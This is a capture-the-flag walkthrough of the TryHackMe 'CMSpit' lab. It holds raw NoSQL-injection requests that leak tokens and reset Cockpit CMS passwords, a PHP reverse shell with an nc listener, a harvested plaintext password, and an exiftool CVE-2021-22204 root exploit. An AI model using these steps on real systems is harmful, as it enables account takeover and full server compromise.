CMSpit

Room Link: https://tryhackme.com/room/cmspit

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

CMS Version is 0.11.1

User account compromise

This CMS version has a exploit to help us find users.

Exploit: https://swarm.ptsecurity.com/rce-cockpit-cms/

Burp

GET /auth/requestreset HTTP/1.1
Host: 10.10.198.113
Content-Length: 25
Content-type: application/json

{
  "user":"admin"
}

Burp

GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 38
Content-type: application/json

{
"token":{
"$func":"var_dump"
}
}

Burp

GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json

{
"token":"rp-25badb6dbd66e39732cc3abf8122ba9065b6ee57e7610"
}

Did the same thing for user skidy

Burp

GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json

{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e"
}

I don't know if the last part was really necessary. I think maybe the reset token can be different then the other token in which case the above step would be necessary but its the same so I just updated the password for skidy.

Burp

GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 88
Content-type: application/json

{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e",
"password":"hacked"
}

I can now login as Skidy

Initial Shell

Kali

git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234 

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Lateral Movement (Stux)

Victim

cd /home/stux
cat .dbshell

Victim

su stux
Password: p4ssw0rdhack3d!123

Victim

sudo -l

Privilege Escalation

Exploit: https://github.com/convisolabs/CVE-2021-22204-exiftool/blob/master/exploit.py

Victim(receiving)

nc -l -p 1234 > cve.tar.gz

Kali(sending)

git clone https://github.com/se162xg/CVE-2021-22204.git
tar cvf cve.tar.gz  CVE-2021-22204/
nc -w 3 $VICTIM 1234 < cve.tar.gz

Victim

tar xvf cve.tar.gz 
cd CVE-2021-22204

Victim

bash craft_a_djvu_exploit.sh '/bin/bash'
sudo /usr/local/bin/exiftool delicate.jpg